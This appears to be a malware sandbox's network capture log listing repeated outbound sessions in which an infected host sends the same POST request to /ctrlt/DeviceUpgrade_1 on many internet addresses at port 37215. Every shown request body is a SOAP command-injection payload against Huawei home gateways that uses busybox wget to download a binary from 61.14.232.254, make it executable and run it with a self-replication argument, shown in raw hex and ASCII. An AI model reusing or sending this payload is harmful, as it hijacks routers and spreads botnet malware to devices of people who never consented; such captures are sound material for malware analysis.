                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1293192.168.2.1337886197.80.185.9537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.534168005 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1294192.168.2.136043241.241.93.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.534192085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1295192.168.2.1360590114.231.59.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.534228086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1296192.168.2.134463841.174.222.3237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.534687996 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1297192.168.2.135905451.105.75.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.534751892 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1298192.168.2.1339346203.203.172.25037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.534786940 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1299192.168.2.1350908157.110.186.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.534828901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1300192.168.2.1360650121.144.11.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.535181999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1301192.168.2.1334594197.138.252.19737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.535245895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1302192.168.2.135976841.187.243.9737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.535264969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 